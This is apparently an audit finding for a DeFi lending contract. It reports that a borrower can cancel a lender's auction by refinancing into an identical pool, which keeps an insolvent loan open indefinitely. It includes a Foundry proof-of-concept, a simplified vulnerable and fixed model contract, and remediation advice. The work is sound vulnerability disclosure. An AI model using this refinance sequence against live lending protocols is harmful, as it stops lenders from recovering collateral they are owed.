Submission Details
Severity: high
Valid

Borrower can use Refinance to cancel auctions so they can extend their loan indefinitely

Summary

When a lender starts an auction on a loan, the borrower can call refinance() to move the loan into a pool with exactly the same terms as the current one, and then immediately move it back into the original pool with giveLoan() or another refinance(). Each refinance resets the loan's auction start timestamp, which cancels the running auction and lets the borrower keep the loan open indefinitely, even when it is insolvent.

Vulnerability Details

The Foundry test below shows that refinance() resets the loan's auction timestamp. The lender starts the auction with:

lender.startAuction(loanIds);

The pool's auctionLength is 1 days, so the auction should end one day after the current block.timestamp. The borrower then refinances the loan into lender2's pool, which has identical terms.

A loan with no running auction stores type(uint256).max as its auction start timestamp. If refinance() resets the auction timestamp, the loan's auction start timestamp reads back as that sentinel after the refinance:

assertEq(auctionTimestamp, type(uint256).max);

The test passes, confirming that the refinance cancelled the auction.

    function test_refinance_during_auction() public {
        // test_borrow() is the existing setup in this test file: lender1 opens a
        // pool and borrower takes loan 0 from it.
        test_borrow();

        // lender2 opens a second pool with the same terms as lender1's pool.
        vm.startPrank(lender2);
        Pool memory p = Pool({
            lender: lender2,
            loanToken: address(loanToken),
            collateralToken: address(collateralToken),
            minLoanSize: 100*10**18,
            poolBalance: 1000*10**18,
            maxLoanRatio: 2*10**18,
            auctionLength: 1 days,
            interestRate: 1000,
            outstandingLoans: 0
        });
        lender.setPool(p);
        vm.stopPrank();

        // lender1 puts loan 0 up for auction.
        vm.startPrank(lender1);
        uint256[] memory loanIds = new uint256[](1);
        loanIds[0] = 0;
        lender.startAuction(loanIds);
        vm.stopPrank();

        // The borrower refinances the auctioned loan into lender2's pool.
        vm.startPrank(borrower);
        Refinance memory r = Refinance({
            loanId: 0,
            poolId: keccak256(
                abi.encode(
                    address(lender2),
                    address(loanToken),
                    address(collateralToken)
                )
            ),
            debt: 100*10**18,
            collateral: 100*10**18
        });
        Refinance[] memory rs = new Refinance[](1);
        rs[0] = r;
        lender.refinance(rs);
        vm.stopPrank();

        // The auction start timestamp has been reset to the "no auction" sentinel.
        (,,,,,,,,uint auctionTimestamp,) = lender.loans(0);
        assertEq(auctionTimestamp, type(uint256).max);
    }

Impact

The borrower can keep the loan open indefinitely and the lender can never seize the collateral, even when the loan is insolvent.

Tools Used

Foundry

Recommendations

Do not reset the loan's auction start timestamp (or its auction length) when refinance() is called, so an auction started by the lender keeps its original end time. Alternatively, have refinance() revert while an auction is running, so the borrower cannot move a loan the lender is already trying to seize.
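The following is an added illustration, not the audited lender contract's own code or tests: a minimal stand-alone model of a loan with a lender-started auction, with the vulnerable refinance path (auction timestamp reset to the sentinel) and the recommended fix (auction start and length preserved) selected by a constructor flag. The contract and function names, the NO_AUCTION sentinel, the preserveAuction switch and the addresses in the tests are assumptions; pool matching, token transfers and interest are omitted. The two Foundry tests reproduce the report's observation and show that with the fix the auction still ends on its original schedule.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

// Added stand-alone model of the auction/refinance interaction, not the audited
// lender contract's code. Names, the NO_AUCTION sentinel and the preserveAuction
// switch are assumptions; pool matching, token transfers and interest are omitted.
contract LoanAuctionModel {
    uint256 public constant NO_AUCTION = type(uint256).max;
    struct Loan {
        address lender;
        address borrower;
        uint256 auctionStartTimestamp; // NO_AUCTION while no auction is running
        uint256 auctionLength;
    }
    Loan[] public loans;
    bool public immutable preserveAuction; // false = vulnerable, true = fixed

    constructor(bool _preserveAuction) { preserveAuction = _preserveAuction; }

    function open(address lender, address borrower, uint256 auctionLength) external returns (uint256 id) {
        loans.push(Loan(lender, borrower, NO_AUCTION, auctionLength));
        id = loans.length - 1;
    }

    function startAuction(uint256 id) external {
        Loan storage l = loans[id];
        require(msg.sender == l.lender, "not lender");
        require(l.auctionStartTimestamp == NO_AUCTION, "auction live");
        l.auctionStartTimestamp = block.timestamp;
    }

    // End of the running auction, or NO_AUCTION if none is running.
    function auctionEnd(uint256 id) public view returns (uint256) {
        Loan storage l = loans[id];
        if (l.auctionStartTimestamp == NO_AUCTION) return NO_AUCTION;
        return l.auctionStartTimestamp + l.auctionLength;
    }

    // Lender takes the collateral once the auction has run its course.
    function seize(uint256 id) external {
        require(msg.sender == loans[id].lender, "not lender");
        require(block.timestamp >= auctionEnd(id), "auction not over");
        delete loans[id]; // collateral transfer omitted
    }

    // Borrower moves the loan to another lender's pool.
    function refinance(uint256 id, address newLender, uint256 newAuctionLength) external {
        Loan storage l = loans[id];
        require(msg.sender == l.borrower, "not borrower");
        l.lender = newLender;
        if (!preserveAuction) {
            // Vulnerable behaviour: a running auction is silently cancelled.
            l.auctionStartTimestamp = NO_AUCTION;
            l.auctionLength = newAuctionLength;
        } else if (l.auctionStartTimestamp == NO_AUCTION) {
            // Fix: a live auction keeps its start and length, so refinancing can neither
            // cancel it nor push its end out; only an un-auctioned loan takes the new length.
            l.auctionLength = newAuctionLength;
        }
    }
}

contract RefinanceDuringAuctionTest is Test {
    address lender1 = address(0x1);
    address lender2 = address(0x2);
    address borrower = address(0x3);

    // Open loan 0 for lender1, auction it, refinance into lender2's pool (same 1 day length).
    function _run(LoanAuctionModel m) internal returns (uint256 endBefore, uint256 endAfter) {
        uint256 id = m.open(lender1, borrower, 1 days);
        vm.prank(lender1);
        m.startAuction(id);
        endBefore = m.auctionEnd(id);
        vm.prank(borrower);
        m.refinance(id, lender2, 1 days);
        endAfter = m.auctionEnd(id);
    }

    function test_vulnerable_refinance_cancels_auction() public {
        LoanAuctionModel m = new LoanAuctionModel(false);
        (uint256 endBefore, uint256 endAfter) = _run(m);
        assertEq(endBefore, block.timestamp + 1 days);
        assertEq(endAfter, m.NO_AUCTION()); // auction gone; the borrower can repeat this forever
        vm.warp(endBefore);
        vm.prank(lender2);
        vm.expectRevert(bytes("auction not over"));
        m.seize(0); // the collateral cannot be seized when the auction should have ended
    }

    function test_fixed_refinance_keeps_auction() public {
        LoanAuctionModel m = new LoanAuctionModel(true);
        (uint256 endBefore, uint256 endAfter) = _run(m);
        assertEq(endAfter, endBefore);
        vm.warp(endAfter);
        vm.prank(lender2); // the pool now holding the loan seizes on the original schedule
        m.seize(0);
    }
}
```

Run with forge test in a project that has forge-std installed. The stricter alternative from the recommendation is a one-line change in refinance(): require(l.auctionStartTimestamp == NO_AUCTION, "auction live") before any state is touched, which rejects the borrower's move outright instead of carrying the auction over to the new lender.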
